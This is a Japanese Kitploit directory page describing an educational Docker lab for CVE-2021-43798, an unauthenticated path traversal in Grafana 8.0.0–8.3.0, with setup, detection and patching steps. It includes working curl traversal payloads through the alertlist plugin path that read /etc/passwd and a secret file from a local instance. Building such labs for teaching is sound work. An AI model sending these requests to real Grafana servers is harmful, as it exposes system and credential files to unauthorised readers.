Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana 未認証パストラバーサル - Security Lab | Shivam Gupta | 23104003 | Kitploit
ツール/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana 未認証パストラバーサル - Security Lab | Shivam Gupta | 23104003

リポジトリを見る
6時間45分前未レビュー

CVE-2021-43798 — Grafana 認証不要のパストラバーサルラボ

教育目的のみ。 このラボは隔離されたローカルマシン上でのみ実行してください。インターネットに公開しないでください。


CVE 概要

項目詳細
CVE IDCVE-2021-43798
製品Grafana
影響を受けるバージョン8.0.0 – 8.3.0
修正済みバージョン8.3.1+
深刻度High
CVSS v3.1 スコア7.5
CWECWE-22 — パストラバーサル
認証要否不要
攻撃ベクターネットワーク

前提条件

  • Docker Desktop(起動済み)
  • Git
  • curl

セットアップ

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

脆弱な環境の起動

root@kitploit:~
docker compose up -d

確認:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

http://127.0.0.1:3000 を開く — ログイン: admin / admin


脆弱性の悪用

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

期待される結果: ファイルの内容が HTTP 200 で返される — 認証は不要。


検出

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

hostname が返された場合 → 脆弱。バージョン 8.0.0–8.3.0 → 脆弱。


修復

修正済みインスタンス(Grafana 8.3.1)を起動:

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

エクスプロイトがブロックされることを確認:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

ラボの停止

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

参考資料

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
ツールをダウンロード